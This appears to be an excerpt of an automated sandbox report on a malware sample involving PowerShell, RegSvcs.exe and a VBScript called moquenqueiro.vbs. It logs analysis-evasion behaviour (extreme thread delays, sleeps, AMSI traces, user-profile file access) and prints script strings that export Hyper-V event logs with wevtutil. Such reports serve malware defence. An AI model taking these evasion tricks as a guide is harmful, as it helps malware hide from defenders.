Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: UserDomain();IWshNetwork2.UserName();IHost.CreateObject("WScript.Network");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\Brother", "Brother");IWshNetwork2.AddWindowsPrinterConnection("\\SR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1932	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1486	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3626	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6180	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 9667	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 5004	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4976	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912	Thread sleep count: 3626 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912	Thread sleep count: 6180 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1584	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: wscript.exe, 0000000E.00000003.2705437884.00000138EB3C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2666324109.00000138EAFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2705746707.00000138EB1C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2705570277.00000138EADC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2809230195.000001D5FB399000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2809439571.000001D5FB191000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2760933479.000001D5FAF95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2809323768.000001D5FAD91000.00000004.00000020.00020000.00000000.sdmp, moquenqueiro.vbs.9.dr	Binary or memory string: cmd = "cmd /c wevtutil epl ""Microsoft-Windows-Hyper-V-VMMS-Networking"" " & vmmslogFileName
Source: moquenqueiro.vbs.9.dr	Binary or memory string: "$output += ""(Get-VMNetworkAdapter -all)""; " & _
Source: wscript.exe, 0000000E.00000003.2705437884.00000138EB3C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2666324109.00000138EAFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2705746707.00000138EB1C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2705570277.00000138EADC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2809230195.000001D5FB399000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2809439571.000001D5FB191000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2760933479.000001D5FAF95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2809323768.000001D5FAD91000.00000004.00000020.00020000.00000000.sdmp, moquenqueiro.vbs.9.dr	Binary or memory string: cmd = "cmd /c wevtutil epl System /q:""*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"" " & vmswitchlogFileName
